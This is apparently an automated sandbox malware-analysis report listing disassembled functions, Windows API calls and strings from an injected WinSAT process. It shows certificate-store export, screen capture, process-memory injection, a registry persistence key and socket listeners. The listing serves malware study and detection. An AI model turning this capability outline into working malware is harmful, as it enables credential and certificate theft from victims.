Function 01D26AAA, Relevance: 4.5, APIs: 3, Instructions: 41

APIs

GetTokenInformation.KERNELBASE(?,00000001,00000000,00000000,00000000,00000000,00000000,?,?,01D249F4,?,?,?,01D22326,000000FF,01D32C08), ref: 01D26AC3
GetLastError.KERNEL32(?,?,01D249F4,?,?,?,01D22326,000000FF,01D32C08,?,?,00000000), ref: 01D26AC9

Part of subcall function 01D2338B: HeapAlloc.KERNEL32(00000008,-00000004,01D24B59,00000000,?,?,?,01D21E08,00000000,01D222ED,?,?,00000000), ref: 01D2339C

GetTokenInformation.KERNELBASE(?,00000001,00000000,00000000,00000000,?,?,01D249F4,?,?,?,01D22326,000000FF,01D32C08), ref: 01D26AEF

Part of subcall function 01D233BB: HeapFree.KERNEL32(00000000,00000000,01D24BB2), ref: 01D233CE

Memory Dump Source

Source File: 00000008.00000002.1765520011.01D10000.00000040.sdmp, Offset: 01D10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d10000_WinSAT.jbxd

Function 01D249D2, Relevance: 4.5, APIs: 3, Instructions: 37

APIs

OpenProcessToken.ADVAPI32(?,00000008,?,76C61857,?,?,01D22326,000000FF,01D32C08,?,?,00000000), ref: 01D249E2

Part of subcall function 01D26AAA: GetTokenInformation.KERNELBASE(?,00000001,00000000,00000000,00000000,00000000,00000000,?,?,01D249F4,?,?,?,01D22326,000000FF,01D32C08), ref: 01D26AC3
Part of subcall function 01D26AAA: GetLastError.KERNEL32(?,?,01D249F4,?,?,?,01D22326,000000FF,01D32C08,?,?,00000000), ref: 01D26AC9
Part of subcall function 01D26AAA: GetTokenInformation.KERNELBASE(?,00000001,00000000,00000000,00000000,?,?,01D249F4,?,?,?,01D22326,000000FF,01D32C08), ref: 01D26AEF

GetTokenInformation.KERNELBASE(?,0000000C,00000000,00000004,00000000,?,?,?,01D22326,000000FF,01D32C08), ref: 01D24A0E

Part of subcall function 01D233BB: HeapFree.KERNEL32(00000000,00000000,01D24BB2), ref: 01D233CE

CloseHandle.KERNEL32(?), ref: 01D24A23

Memory Dump Source

Source File: 00000008.00000002.1765520011.01D10000.00000040.sdmp, Offset: 01D10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d10000_WinSAT.jbxd

Function 01D2763A, Relevance: 4.5, APIs: 3, Instructions: 36

APIs

RegCreateKeyExW.KERNEL32(80000001,?,00000000,00000000,00000000,00000002,00000000,00000004,00000000,80000001,?,?,01D29EAB,?,?,00000004), ref: 01D27658
RegSetValueExW.KERNEL32(00000004,00000004,00000000,?,?,01D29EAB,?,?,01D29EAB,?,?,00000004,?,00000004), ref: 01D27672
RegCloseKey.ADVAPI32(00000004,?,?,01D29EAB,?,?,00000004,?,00000004), ref: 01D27681

Memory Dump Source

Source File: 00000008.00000002.1765520011.01D10000.00000040.sdmp, Offset: 01D10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d10000_WinSAT.jbxd

Function 01D22BA3, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 83

APIs

Part of subcall function 01D220C4: GetModuleHandleW.KERNEL32(00000000,?,?,00000000), ref: 01D22105
Part of subcall function 01D220C4: LoadLibraryA.KERNEL32(?,LoadLibraryA,GetProcAddress,?,?,00000000), ref: 01D22172
Part of subcall function 01D220C4: GetProcAddress.KERNELBASE(?,?,?,?,00000000), ref: 01D221A7
Part of subcall function 01D220C4: GetModuleHandleW.KERNEL32(?,LoadLibraryA,GetProcAddress,?,?,00000000), ref: 01D221DB
Part of subcall function 01D220C4: GetProcAddress.KERNEL32(00000000,NtCreateThread,?,?,00000000), ref: 01D221FA
Part of subcall function 01D220C4: GetProcAddress.KERNEL32(NtCreateUserProcess,?,?,00000000), ref: 01D2220C
Part of subcall function 01D220C4: GetProcAddress.KERNEL32(NtQueryInformationProcess,?,?,00000000), ref: 01D2221E
Part of subcall function 01D220C4: GetProcAddress.KERNEL32(RtlUserThreadStart,?,?,00000000), ref: 01D22230
Part of subcall function 01D220C4: GetProcAddress.KERNEL32(LdrLoadDll,?,?,00000000), ref: 01D22242
Part of subcall function 01D220C4: GetProcAddress.KERNEL32(LdrGetDllHandle,?,?,00000000), ref: 01D22254
Part of subcall function 01D220C4: HeapCreate.KERNELBASE(00000000,00080000,00000000,?,?,00000000), ref: 01D2228D
Part of subcall function 01D220C4: GetProcessHeap.KERNEL32(?,?,00000000), ref: 01D2229C
Part of subcall function 01D220C4: InitializeCriticalSection.KERNEL32(01D3400C,?,?,00000000), ref: 01D222C9
Part of subcall function 01D220C4: WSAStartup.WS2_32(00000202,?), ref: 01D222DF
Part of subcall function 01D220C4: CreateEventW.KERNEL32(01D32C30,00000001,00000000,00000000,?,?,00000000), ref: 01D22300
Part of subcall function 01D220C4: GetLengthSid.ADVAPI32(00000000,000000FF,01D32C08,?,?,00000000), ref: 01D22335
Part of subcall function 01D220C4: GetCurrentProcessId.KERNEL32(00000000,037CF7D0,00000000,?,?,00000000), ref: 01D22362

Part of subcall function 01D22A32: CloseHandle.KERNEL32(01D32AF0), ref: 01D22AF2

Part of subcall function 01D1E959: CreateMutexW.KERNELBASE(Function_00022C30,00000000,Global\{A98E1C61-ACC4-103D-676C-E42BACAD1769},?,?,01D14E69,?,?,?,743C152E,00000002), ref: 01D1E97F

CoInitializeEx.OLE32(00000000,00000002), ref: 01D22C62

Part of subcall function 01D29837: CoUninitialize.OLE32 ref: 01D29845

Part of subcall function 01D2D486: CertOpenSystemStoreW.CRYPT32(00000000,01D14BBC,?,00000000,00000001), ref: 01D2D4A1
Part of subcall function 01D2D486: CertEnumCertificatesInStore.CRYPT32(00000000,00000000,?,00000000,00000001), ref: 01D2D4BD
Part of subcall function 01D2D486: CertEnumCertificatesInStore.CRYPT32(?,00000000,?,00000000,00000001), ref: 01D2D4C9
Part of subcall function 01D2D486: PFXExportCertStoreEx.CRYPT32(?,?,?,00000000,00000004,?,00000000,00000001), ref: 01D2D508
Part of subcall function 01D2D486: PFXExportCertStoreEx.CRYPT32(?,?,?,00000000,00000004,?,00000000,00000001), ref: 01D2D538
Part of subcall function 01D2D486: CharLowerW.USER32 ref: 01D2D556
Part of subcall function 01D2D486: GetSystemTime.KERNEL32(?,?,?,00000000,00000001), ref: 01D2D561
Part of subcall function 01D2D486: CertCloseStore.CRYPT32(?,00000000), ref: 01D2D5EA

Part of subcall function 01D2D5FB: CertOpenSystemStoreW.CRYPT32(00000000,01D14BBC,?,00000001,01D22C2A), ref: 01D2D606
Part of subcall function 01D2D5FB: CertDuplicateCertificateContext.CRYPT32(00000000,?,?,00000001,01D22C2A), ref: 01D2D61F
Part of subcall function 01D2D5FB: CertDeleteCertificateFromStore.CRYPT32(00000000,?,?,00000001,01D22C2A), ref: 01D2D62A
Part of subcall function 01D2D5FB: CertEnumCertificatesInStore.CRYPT32(00000000,00000000,00000000,?,?,00000001,01D22C2A), ref: 01D2D632
Part of subcall function 01D2D5FB: CertCloseStore.CRYPT32(00000000,00000000,?,?,00000001,01D22C2A), ref: 01D2D63E

Part of subcall function 01D2A138: SHGetFolderPathW.SHELL32(00000000,00000021,00000000,00000000,?), ref: 01D2A170

Strings

@, xrefs: 01D22C99

Memory Dump Source

Source File: 00000008.00000002.1765520011.01D10000.00000040.sdmp, Offset: 01D10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d10000_WinSAT.jbxd

Function 01D1E959, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30

APIs

CreateMutexW.KERNELBASE(Function_00022C30,00000000,Global\{A98E1C61-ACC4-103D-676C-E42BACAD1769},?,?,01D14E69,?,?,?,743C152E,00000002), ref: 01D1E97F

Part of subcall function 01D1E89E: RegOpenKeyExW.ADVAPI32(80000001,SOFTWARE\Microsoft\Xyuxy,00000000,00000001,?,?,76C605D7,00000000), ref: 01D1E8E0

Part of subcall function 01D26B07: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 01D26B0A
Part of subcall function 01D26B07: CloseHandle.KERNEL32(00000000), ref: 01D26B1C

Strings

Global\{A98E1C61-ACC4-103D-676C-E42BACAD1769}, xrefs: 01D1E95A, 01D1E963, 01D1E96C, 01D1E977

Memory Dump Source

Source File: 00000008.00000002.1765520011.01D10000.00000040.sdmp, Offset: 01D10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d10000_WinSAT.jbxd

Function 01D29D6D, Relevance: 3.2, APIs: 2, Instructions: 172

APIs

InitializeCriticalSection.KERNEL32(01D33F24,00000000,7718F8FF), ref: 01D29D8F

Part of subcall function 01D27595: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?,?,?,?,01D29E26,?,?), ref: 01D275AD

RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?,?,?,00000000), ref: 01D29E63

Part of subcall function 01D2763A: RegCreateKeyExW.KERNEL32(80000001,?,00000000,00000000,00000000,00000002,00000000,00000004,00000000,80000001,?,?,01D29EAB,?,?,00000004), ref: 01D27658
Part of subcall function 01D2763A: RegSetValueExW.KERNEL32(00000004,00000004,00000000,?,?,01D29EAB,?,?,01D29EAB,?,?,00000004,?,00000004), ref: 01D27672
Part of subcall function 01D2763A: RegCloseKey.ADVAPI32(00000004,?,?,01D29EAB,?,?,00000004,?,00000004), ref: 01D27681

Part of subcall function 01D240AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 01D240CF

Part of subcall function 01D27711: RegQueryValueExW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,80000001,01D29E78,?), ref: 01D2771E
Part of subcall function 01D27711: RegCloseKey.KERNEL32(?), ref: 01D2772E

Memory Dump Source

Source File: 00000008.00000002.1765520011.01D10000.00000040.sdmp, Offset: 01D10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d10000_WinSAT.jbxd

Function 01D21EE1, Relevance: 3.1, APIs: 2, Instructions: 56

APIs

SHGetFolderPathW.SHELL32(00000000,00000025,00000000,00000000,?), ref: 01D21F2C

Part of subcall function 01D28C40: PathCombineW.SHLWAPI(01D21F45,01D21F45,?), ref: 01D28C5F

lstrcmpiW.KERNEL32(?,?,?), ref: 01D21F56

Memory Dump Source

Source File: 00000008.00000002.1765520011.01D10000.00000040.sdmp, Offset: 01D10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d10000_WinSAT.jbxd

Function 01D27607, Relevance: 3.0, APIs: 2, Instructions: 20

APIs

RegQueryValueExW.KERNEL32(?,?,00000000,?,01D29E26,?,?,?,01D275CD,?,?,00000000,00000004,?), ref: 01D2761F
RegCloseKey.KERNEL32(?,?,01D275CD,?,?,00000000,00000004,?,?,?,?,01D29E26,?,?), ref: 01D2762D

Memory Dump Source

Source File: 00000008.00000002.1765520011.01D10000.00000040.sdmp, Offset: 01D10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d10000_WinSAT.jbxd

Function 01D27711, Relevance: 3.0, APIs: 2, Instructions: 18

APIs

RegQueryValueExW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,80000001,01D29E78,?), ref: 01D2771E
RegCloseKey.KERNEL32(?), ref: 01D2772E

Memory Dump Source

Source File: 00000008.00000002.1765520011.01D10000.00000040.sdmp, Offset: 01D10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d10000_WinSAT.jbxd

Function 01D1BE3B, Relevance: 1.6, APIs: 1, Instructions: 62

APIs

VirtualAllocEx.KERNELBASE(000000FF,00000000,00000004,00003000,00000040,00000000,76C61857,?,?,01D1C160,01D32360), ref: 01D1BE72

Part of subcall function 01D1BD44: VirtualProtectEx.KERNEL32(000000FF,DB84D88A,0000001E,00000040,01D1C160,00000000,00000000,00000004,?,?,01D1C160,01D32360), ref: 01D1BD86
Part of subcall function 01D1BD44: WriteProcessMemory.KERNEL32(000000FF,DB84D88A,?,35FFC690,00000000,?,?,01D1C160,01D32360), ref: 01D1BD9C
Part of subcall function 01D1BD44: VirtualProtectEx.KERNEL32(000000FF,DB84D88A,0000001E,01D1C160,01D1C160,?,?,01D1C160,01D32360), ref: 01D1BDB6

Part of subcall function 01D27BF7: VirtualProtectEx.KERNELBASE(000000FF,01D1C160,0000001E,00000040,01D32360,01D1C158,00000004,?,?,?,?,01D1BE97,6A01D323,00000000), ref: 01D27C24
Part of subcall function 01D27BF7: ReadProcessMemory.KERNELBASE(000000FF,01D1C160,?,0000001E,00000000,?,00000090,00000023,?,?,?,?,01D1BE97,6A01D323,00000000), ref: 01D27C4B
Part of subcall function 01D27BF7: WriteProcessMemory.KERNELBASE(000000FF,?,?,00000005,00000000,?,00000000,00000000), ref: 01D27CC5
Part of subcall function 01D27BF7: WriteProcessMemory.KERNELBASE(000000FF,?,000000E9,00000005,00000000), ref: 01D27CED
Part of subcall function 01D27BF7: VirtualProtectEx.KERNELBASE(000000FF,01D1C160,0000001E,01D32360,01D32360,?,?,?,?,01D1BE97,6A01D323,00000000,?,?,01D1C160,01D32360), ref: 01D27D05

Memory Dump Source

Source File: 00000008.00000002.1765520011.01D10000.00000040.sdmp, Offset: 01D10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d10000_WinSAT.jbxd

Function 01D27595, Relevance: 1.5, APIs: 1, Instructions: 35

APIs

RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?,?,?,?,01D29E26,?,?), ref: 01D275AD

Part of subcall function 01D27607: RegQueryValueExW.KERNEL32(?,?,00000000,?,01D29E26,?,?,?,01D275CD,?,?,00000000,00000004,?), ref: 01D2761F
Part of subcall function 01D27607: RegCloseKey.KERNEL32(?,?,01D275CD,?,?,00000000,00000004,?,?,?,?,01D29E26,?,?), ref: 01D2762D

Memory Dump Source

Source File: 00000008.00000002.1765520011.01D10000.00000040.sdmp, Offset: 01D10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d10000_WinSAT.jbxd

Non-executed Functions

Function 01D2D486, Relevance: 12.1, APIs: 8, Instructions: 119

APIs

CertOpenSystemStoreW.CRYPT32(00000000,01D14BBC,?,00000000,00000001), ref: 01D2D4A1
CertEnumCertificatesInStore.CRYPT32(00000000,00000000,?,00000000,00000001), ref: 01D2D4BD
CertEnumCertificatesInStore.CRYPT32(?,00000000,?,00000000,00000001), ref: 01D2D4C9
PFXExportCertStoreEx.CRYPT32(?,?,?,00000000,00000004,?,00000000,00000001), ref: 01D2D508

Part of subcall function 01D2338B: HeapAlloc.KERNEL32(00000008,-00000004,01D24B59,00000000,?,?,?,01D21E08,00000000,01D222ED,?,?,00000000), ref: 01D2339C

PFXExportCertStoreEx.CRYPT32(?,?,?,00000000,00000004,?,00000000,00000001), ref: 01D2D538
CharLowerW.USER32 ref: 01D2D556
GetSystemTime.KERNEL32(?,?,?,00000000,00000001), ref: 01D2D561

Part of subcall function 01D2D42A: GetUserNameExW.SECUR32(00000002,?,00000001,?,?,?,01D2D581,?,?,00000000), ref: 01D2D43F

Part of subcall function 01D240AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 01D240CF

Part of subcall function 01D233BB: HeapFree.KERNEL32(00000000,00000000,01D24BB2), ref: 01D233CE

CertCloseStore.CRYPT32(?,00000000), ref: 01D2D5EA

Memory Dump Source

Source File: 00000008.00000002.1765520011.01D10000.00000040.sdmp, Offset: 01D10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d10000_WinSAT.jbxd

Function 01D2D5FB, Relevance: 7.5, APIs: 5, Instructions: 36

APIs

CertOpenSystemStoreW.CRYPT32(00000000,01D14BBC,?,00000001,01D22C2A), ref: 01D2D606
CertDuplicateCertificateContext.CRYPT32(00000000,?,?,00000001,01D22C2A), ref: 01D2D61F
CertDeleteCertificateFromStore.CRYPT32(00000000,?,?,00000001,01D22C2A), ref: 01D2D62A
CertEnumCertificatesInStore.CRYPT32(00000000,00000000,00000000,?,?,00000001,01D22C2A), ref: 01D2D632
CertCloseStore.CRYPT32(00000000,00000000,?,?,00000001,01D22C2A), ref: 01D2D63E

Memory Dump Source

Source File: 00000008.00000002.1765520011.01D10000.00000040.sdmp, Offset: 01D10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d10000_WinSAT.jbxd

Function 01D264FD, Relevance: 6.0, APIs: 4, Instructions: 32

APIs

socket.WS2_32(00000000,00000001,00000006), ref: 01D26506
bind.WS2_32(00000000,?,-0000001D), ref: 01D26526
listen.WS2_32(00000000,?), ref: 01D26535
#3.WS2_32(00000000,?,01D14C21,7FFFFFFF,?,00000000,00000080), ref: 01D26540

Memory Dump Source

Source File: 00000008.00000002.1765520011.01D10000.00000040.sdmp, Offset: 01D10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d10000_WinSAT.jbxd

Function 01D267DB, Relevance: 4.5, APIs: 3, Instructions: 27

APIs

socket.WS2_32(00000000,00000002,00000011), ref: 01D267E4
bind.WS2_32(00000000,00000017,-0000001D), ref: 01D26804
#3.WS2_32(00000000), ref: 01D2680F

Memory Dump Source

Source File: 00000008.00000002.1765520011.01D10000.00000040.sdmp, Offset: 01D10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d10000_WinSAT.jbxd

Function 01D1EA11, Relevance: 82.6, APIs: 27, Strings: 20, Instructions: 389

APIs

LoadLibraryA.KERNEL32(gdiplus.dll), ref: 01D1EA43
GetProcAddress.KERNEL32(00000000,GdiplusStartup), ref: 01D1EA54
GetProcAddress.KERNEL32(00000000,GdiplusShutdown), ref: 01D1EA61
GetProcAddress.KERNEL32(00000000,GdipCreateBitmapFromHBITMAP), ref: 01D1EA6E
GetProcAddress.KERNEL32(00000000,GdipDisposeImage), ref: 01D1EA7B
GetProcAddress.KERNEL32(00000000,GdipGetImageEncodersSize), ref: 01D1EA88
GetProcAddress.KERNEL32(00000000,GdipGetImageEncoders), ref: 01D1EA95
GetProcAddress.KERNEL32(00000000,GdipSaveImageToStream), ref: 01D1EAA2
LoadLibraryA.KERNEL32(ole32.dll), ref: 01D1EAEA
GetProcAddress.KERNEL32(00000000,CreateStreamOnHGlobal), ref: 01D1EAF5
LoadLibraryA.KERNEL32(gdi32.dll), ref: 01D1EB07
GetProcAddress.KERNEL32(00000000,CreateDCW), ref: 01D1EB12
GetProcAddress.KERNEL32(00000000,CreateCompatibleDC), ref: 01D1EB1E
GetProcAddress.KERNEL32(00000000,CreateCompatibleBitmap), ref: 01D1EB2B
GetProcAddress.KERNEL32(00000000,GetDeviceCaps), ref: 01D1EB38
GetProcAddress.KERNEL32(00000000,SelectObject), ref: 01D1EB45
GetProcAddress.KERNEL32(00000000,BitBlt), ref: 01D1EB52
GetProcAddress.KERNEL32(00000000,DeleteObject), ref: 01D1EB5F
GetProcAddress.KERNEL32(00000000,DeleteDC), ref: 01D1EB6C
LoadImageW.USER32(00000000,00007F00,00000002,00000000,00000000,00008040), ref: 01D1EC10
GetIconInfo.USER32(00000000,?), ref: 01D1EC25
GetCursorPos.USER32(?), ref: 01D1EC33
DrawIcon.USER32(?,?,?,?), ref: 01D1ED04

Part of subcall function 01D2338B: HeapAlloc.KERNEL32(00000008,-00000004,01D24B59,00000000,?,?,?,01D21E08,00000000,01D222ED,?,?,00000000), ref: 01D2339C

lstrcmpiW.KERNEL32(?,-00000030), ref: 01D1ED85

Part of subcall function 01D233BB: HeapFree.KERNEL32(00000000,00000000,01D24BB2), ref: 01D233CE

FreeLibrary.KERNEL32(00000000), ref: 01D1EE9C
FreeLibrary.KERNEL32(?), ref: 01D1EEA6
FreeLibrary.KERNEL32(00000000), ref: 01D1EEB0

Strings

GdipGetImageEncodersSize, xrefs: 01D1EA7D
CreateDCW, xrefs: 01D1EB09
CreateCompatibleBitmap, xrefs: 01D1EB20
GdipSaveImageToStream, xrefs: 01D1EA97
GetDeviceCaps, xrefs: 01D1EB2D
CreateCompatibleDC, xrefs: 01D1EB14
gdiplus.dll, xrefs: 01D1EA25
GdiplusStartup, xrefs: 01D1EA4B
DeleteDC, xrefs: 01D1EB61
BitBlt, xrefs: 01D1EB47
gdi32.dll, xrefs: 01D1EB02
DeleteObject, xrefs: 01D1EB54
GdipDisposeImage, xrefs: 01D1EA70
GdipGetImageEncoders, xrefs: 01D1EA8A
GdiplusShutdown, xrefs: 01D1EA56
ole32.dll, xrefs: 01D1EAE5
DISPLAY, xrefs: 01D1EBDE
SelectObject, xrefs: 01D1EB3A
CreateStreamOnHGlobal, xrefs: 01D1EAEC
GdipCreateBitmapFromHBITMAP, xrefs: 01D1EA63

Memory Dump Source

Source File: 00000008.00000002.1765520011.01D10000.00000040.sdmp, Offset: 01D10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d10000_WinSAT.jbxd

Function 01D154A9, Relevance: 52.8, APIs: 29, Strings: 1, Instructions: 308

APIs

Part of subcall function 01D1DCA2: GetClassNameW.USER32(007101CA,?,00000101), ref: 01D1DCBD

GetWindowInfo.USER32(?,?), ref: 01D15515
IntersectRect.USER32(?,?,-00000114), ref: 01D15538
IntersectRect.USER32(?,?,-00000114), ref: 01D1558E
GetDC.USER32(00000000), ref: 01D155D2
CreateCompatibleDC.GDI32(00000000), ref: 01D155E3
ReleaseDC.USER32(00000000,00000000), ref: 01D155ED
SelectObject.GDI32(00000000,?), ref: 01D15602
DeleteDC.GDI32(00000000), ref: 01D15610
TlsSetValue.KERNEL32(?), ref: 01D1565B
EqualRect.USER32(?,?), ref: 01D15675
SaveDC.GDI32(00000000), ref: 01D15680
SetViewportOrgEx.GDI32(00000000,000000FC,?,00000000), ref: 01D1569B
SendMessageW.USER32(?,00000085,00000001,00000000), ref: 01D156BB
DefWindowProcW.USER32(?,00000317,00000000,00000002), ref: 01D156CD
RestoreDC.GDI32(00000000,?), ref: 01D156E4
SaveDC.GDI32(00000000), ref: 01D15706
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 01D1571C
SendMessageW.USER32(?,00000014,00000000,00000000), ref: 01D15735
RestoreDC.GDI32(00000000,?), ref: 01D15743
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 01D15756
SendMessageW.USER32(?,0000000F,00000000,00000000), ref: 01D15766
DefWindowProcW.USER32(?,00000317,00000000,00000004), ref: 01D15778
TlsSetValue.KERNEL32(00000000), ref: 01D15792
SetViewportOrgEx.GDI32(00000000,000000FC,?,00000000), ref: 01D157B2
DefWindowProcW.USER32(00000004,00000317,00000000,0000000E), ref: 01D157CE
SelectObject.GDI32(00000000,?), ref: 01D157E4
DeleteDC.GDI32(00000000), ref: 01D157EB
SetViewportOrgEx.GDI32(00000000,000000FC,?,00000000), ref: 01D15813

Part of subcall function 01D153C7: GdiFlush.GDI32 ref: 01D1541E

PrintWindow.USER32(00000008,00000000,00000000), ref: 01D15829

Strings

<, xrefs: 01D1550B

Memory Dump Source

Source File: 00000008.00000002.1765520011.01D10000.00000040.sdmp, Offset: 01D10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d10000_WinSAT.jbxd

Function 01D22D01, Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 243

APIs

Part of subcall function 01D285D0: CreateFileW.KERNEL32(?,80000000,?,00000000,00000003,00000000,00000000), ref: 01D285F5
Part of subcall function 01D285D0: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,01D22D27,?,?,00000000), ref: 01D28608
Part of subcall function 01D285D0: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,?,?,?,01D22D27,?,?,00000000), ref: 01D28630
Part of subcall function 01D285D0: ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 01D28648
Part of subcall function 01D285D0: VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,01D22D27,?,?,00000000), ref: 01D28662
Part of subcall function 01D285D0: CloseHandle.KERNEL32(?), ref: 01D2866B

Part of subcall function 01D28678: VirtualFree.KERNEL32(?,00000000,00008000,00000000,01D2C83B,?,?,.exe,00000000,00000000,?,.exe,00000006), ref: 01D28689
Part of subcall function 01D28678: CloseHandle.KERNEL32(?), ref: 01D28697

CreateMutexW.KERNEL32(01D32C30,00000001,?,32901130,?,00000001,?), ref: 01D22D91
GetLastError.KERNEL32 ref: 01D22DA3
CloseHandle.KERNEL32(000001E6), ref: 01D22DBA

Part of subcall function 01D1E89E: RegOpenKeyExW.ADVAPI32(80000001,SOFTWARE\Microsoft\Xyuxy,00000000,00000001,?,?,76C605D7,00000000), ref: 01D1E8E0

Part of subcall function 01D231CC: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 01D231ED
Part of subcall function 01D231CC: Process32FirstW.KERNEL32(000001E6,?), ref: 01D23216
Part of subcall function 01D231CC: OpenProcess.KERNEL32(00000400,00000000,?,?,?,76C605D7,00000000), ref: 01D23271
Part of subcall function 01D231CC: CloseHandle.KERNEL32(00000000), ref: 01D2328E
Part of subcall function 01D231CC: GetLengthSid.ADVAPI32(00000000,?,76C605D7,00000000), ref: 01D232A1
Part of subcall function 01D231CC: CloseHandle.KERNEL32(?), ref: 01D2330E
Part of subcall function 01D231CC: Process32NextW.KERNEL32(000001E6,0000022C), ref: 01D2331A
Part of subcall function 01D231CC: CloseHandle.KERNEL32(000001E6), ref: 01D2332B

ExitWindowsEx.USER32(00000014,80000000), ref: 01D22DFD
OpenEventW.KERNEL32(00000002,00000000,?,1A43533F,?,00000001), ref: 01D22E1C
SetEvent.KERNEL32(00000000), ref: 01D22E29
CloseHandle.KERNEL32(00000000), ref: 01D22E30

Part of subcall function 01D22A32: CloseHandle.KERNEL32(01D32AF0), ref: 01D22AF2

CloseHandle.KERNEL32(000001E6), ref: 01D22E42
ReadProcessMemory.KERNEL32(000000FF,00710014,00000002,00000001,00000000,?,19367401,?,00000001,8889347B,00000002), ref: 01D22EA6
Sleep.KERNEL32(000001F4), ref: 01D22EB8
IsWellKnownSid.ADVAPI32(037CF7D0,00000016,?,19367401,?,00000001,8889347B,00000002), ref: 01D22EC9
ReadProcessMemory.KERNEL32(000000FF,00710014,00000000,00000001,00000000), ref: 01D22EF1
GetFileAttributesExW.KERNEL32({3FF5AE44-1EE1-8646-676C-E42BACAD1769},78F16360,0000000C), ref: 01D22F0D
VirtualFree.KERNEL32(?,00000000,00008000,?,00000001,?,?), ref: 01D22F50

Part of subcall function 01D297D0: VirtualProtect.KERNEL32(01D2CA1A,?,00000040,00000000,00710014,?,?,01D22F6C,?,?), ref: 01D297E5
Part of subcall function 01D297D0: VirtualProtect.KERNEL32(01D2CA1A,?,00000000,00000000,?,?,01D22F6C,?,?), ref: 01D29818

CreateEventW.KERNEL32(01D32C30,00000001,00000000,?,1A43533F,?,00000001,00000001,?,00000000,C:\Users\admin\AppData\Roaming,00000000,?,?,?), ref: 01D22FCE
WaitForSingleObject.KERNEL32(?,000000FF), ref: 01D22FE7
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 01D22FF7
CloseHandle.KERNEL32(0000000C), ref: 01D2300D
CloseHandle.KERNEL32(?), ref: 01D23013
CloseHandle.KERNEL32(?), ref: 01D23016

Part of subcall function 01D26B8E: ReleaseMutex.KERNEL32(00000000,01D23021,?,?,?), ref: 01D26B92

Part of subcall function 01D2D0E6: LoadLibraryW.KERNEL32(?), ref: 01D2D107
Part of subcall function 01D2D0E6: GetProcAddress.KERNEL32(00000000,?), ref: 01D2D128
Part of subcall function 01D2D0E6: SHGetFolderPathW.SHELL32(00000000,00000007,000000FF,00000001,?), ref: 01D2D159
Part of subcall function 01D2D0E6: StrCmpNIW.SHLWAPI(?,?,00000000), ref: 01D2D17C
Part of subcall function 01D2D0E6: FreeLibrary.KERNEL32(00000000), ref: 01D2D1A3
Part of subcall function 01D2D0E6: NetUserEnum.NETAPI32(00000000,00000000,00000002,?,000000FF,0000000C,?,?), ref: 01D2D1D9
Part of subcall function 01D2D0E6: NetUserGetInfo.NETAPI32(00000000,?,00000017,?), ref: 01D2D212
Part of subcall function 01D2D0E6: NetApiBufferFree.NETAPI32(?,?,?), ref: 01D2D2AB
Part of subcall function 01D2D0E6: NetApiBufferFree.NETAPI32(?), ref: 01D2D2BE
Part of subcall function 01D2D0E6: SHGetFolderPathW.SHELL32(00000000,00008007,000000FF,00000001,?), ref: 01D2D2E2

Part of subcall function 01D24E20: CharToOemW.USER32(?,?), ref: 01D24E35

Part of subcall function 01D26B9E: OpenMutexW.KERNEL32(00100000,00000000,00000000,01D22E87,?,19367401,?,00000001,8889347B,00000002), ref: 01D26BA9
Part of subcall function 01D26B9E: CloseHandle.KERNEL32(00000000), ref: 01D26BB4

Part of subcall function 01D233BB: HeapFree.KERNEL32(00000000,00000000,01D24BB2), ref: 01D233CE

Part of subcall function 01D22507: CreateMutexW.KERNEL32(01D32C30,00000000,?,?,?,?,?), ref: 01D22528

Part of subcall function 01D2CCCF: StrCmpNIW.SHLWAPI(C:\Users\admin\AppData\Roaming,037CF800,00000000), ref: 01D2CD57
Part of subcall function 01D2CCCF: lstrcmpiW.KERNEL32(?,?,?,?,00000000), ref: 01D2CD6F

Strings

C:\Users\admin\AppData\Roaming, xrefs: 01D22F35, 01D22F6C, 01D22F94
, xrefs: 01D22DD7
{3FF5AE44-1EE1-8646-676C-E42BACAD1769}, xrefs: 01D22F08

Memory Dump Source

Source File: 00000008.00000002.1765520011.01D10000.00000040.sdmp, Offset: 01D10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d10000_WinSAT.jbxd

Function 01D1DD09, Relevance: 25.7, APIs: 17, Instructions: 205

APIs

